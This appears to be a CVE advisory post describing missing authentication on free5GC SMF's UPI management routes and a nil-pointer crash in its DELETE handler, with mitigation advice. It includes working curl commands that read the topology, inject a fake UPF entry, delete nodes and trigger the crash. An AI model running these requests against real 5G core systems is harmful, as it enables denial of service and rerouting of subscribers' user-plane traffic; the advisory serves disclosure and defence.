Listen to this Post
free5GC’s Session Management Function (SMF) exposes the User Plane Information (UPI) management route group without OAuth2/bearer-token authorization middleware. A network attacker who can reach the SMF on its Service-Based Interface (SBI) can directly hit UPI endpoints without any `Authorization` header, and the unauthenticated requests reach the SMF business handlers. The defect is route-group-scoped: the UPI group is mounted without inbound auth middleware, while the sibling `nsmf-oam` group on the same SMF instance returns `401 Unauthorized` for token-less requests, proving OAuth2 middleware is wired in for other groups but not for UPI. Code evidence shows the UPI group is mounted without auth middleware in `NFs/smf/internal/sbi/server.go:76` and 78, whereas the OAM group uses auth in `server.go:99` and 105. The vulnerable handlers are implemented in api_upi.go:44, 60, and `84` for read, write, and delete operations respectively. In the DELETE handler (api_upi.go:94 and 99), the code unconditionally calls `upNode.UPF.CancelAssociation()` after mutating the topology, even for AN‑typed nodes that are constructed without a UPF object, leading to a nil‑pointer dereference and a crash. The panic occurs after the topology mutation has already landed, causing both denial of service and state corruption. The vulnerability is present in free5GC v4.2.1 and has been assigned CVE-2026-44328 with a High severity.
dailycve form:
Platform: free5GC SMF
Version: v4.2.1
Vulnerability: missing auth
Severity: High
date: 2026-03-13
Prediction: 2026-03-22
Analytics
The vulnerability manifests as two separate flaws: (1) complete lack of OAuth2 middleware on the entire UPI route group, and (2) an unconditional nil-pointer dereference in the DELETE handler that follows the topology mutation. By comparing logs between the UPI and OAM groups, analysts can quickly identify the missing auth boundary. The following commands can be used to probe an SMF instance:
Check OAM (should be protected)
curl -i http://<SMF_IP>:8000/nsmf-oam/v1/
Check UPI read (vulnerable)
curl -i http://<SMF_IP>:8000/upi/v1/upNodesLinks
Inject fake UPF entry (vulnerable)
curl -i -X POST http://<SMF_IP>:8000/upi/v1/upNodesLinks \
-H 'Content-Type: application/json' \
--data '{"links":[{"A":"gNB1","B":"FAKE-UPF","weight":1}],"upNodes":{"FAKE-UPF":{"type":"UPF","nodeID":"198.51.100.20","addr":"198.51.100.20","sNssaiUpfInfos":[{"sNssai":{"sst":1,"sd":"010203"},"dnnUpfInfoList":[{"dnn":"internet"}]}]}}}'
Delete any node (vulnerable)
curl -i -X DELETE http://<SMF_IP>:8000/upi/v1/upNodesLinks/FAKE-UPF
Delete AN node to trigger panic (vulnerable)
curl -i -X DELETE http://<SMF_IP>:8000/upi/v1/upNodesLinks/gNB1
What Undercode Say:
“No token? No problem—for the UPI group, that’s exactly the design. The missing middleware turns the SMF’s user-plane management into an open door for any attacker who can reach the SBI. This isn’t a configuration glitch; it’s a fundamental route‑group mount error that leaves the entire UPI surface unprotected. Coupled with the unsafe nil dereference in the DELETE handler, a single unauthenticated request can crash the SMF while corrupting the topology it manages.”
Exploit
An attacker with network access to the SMF SBI can:
– Read the current UP‑node and link topology anonymously (GET /upi/v1/upNodesLinks).
– Inject attacker‑controlled UPF entries (nodeID, address, S‑NSSAI, DNN), poisoning the SMF’s view of which UPFs serve which slices/DNNs and biasing subsequent UPF selection for legitimate PDU sessions (POST /upi/v1/upNodesLinks).
– Delete any named entry via DELETE /upi/v1/upNodesLinks/{nodeID}. When deleting an AN node (e.g., gNB1), the handler crashes after mutating the topology, causing a DoS and leaving the topology in an inconsistent state.
All of the above are possible without any Authorization header and with no prior authentication.
Protection from this CVE
- Apply the official patch from `free5gc/smf197` as soon as it is available.
- Until patched, deploy a reverse proxy or API gateway in front of the SMF SBI that enforces OAuth2 validation for all requests to the `/upi/v1/` path.
- Segment the network so that only trusted 5G core functions can reach the SMF SBI port (8000).
- Monitor logs for unexpected
GET,POST, or `DELETE` requests to `/upi/v1/upNodesLinks` without a valid `Authorization` header.
Impact
Missing authentication (CWE‑306) and authorization (CWE‑862) on the SMF UPI route group. An unauthenticated network attacker can read the UP‑plane topology, poison the topology with fake UPF entries, and delete arbitrary nodes—potentially causing denial of service and directing user plane traffic to attacker‑controlled UPFs. The impact is High because the vulnerable SBI is typically reachable within the 5G core network, and the write/delete capabilities allow an attacker to alter the SMF’s operational state with no prior privileges.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
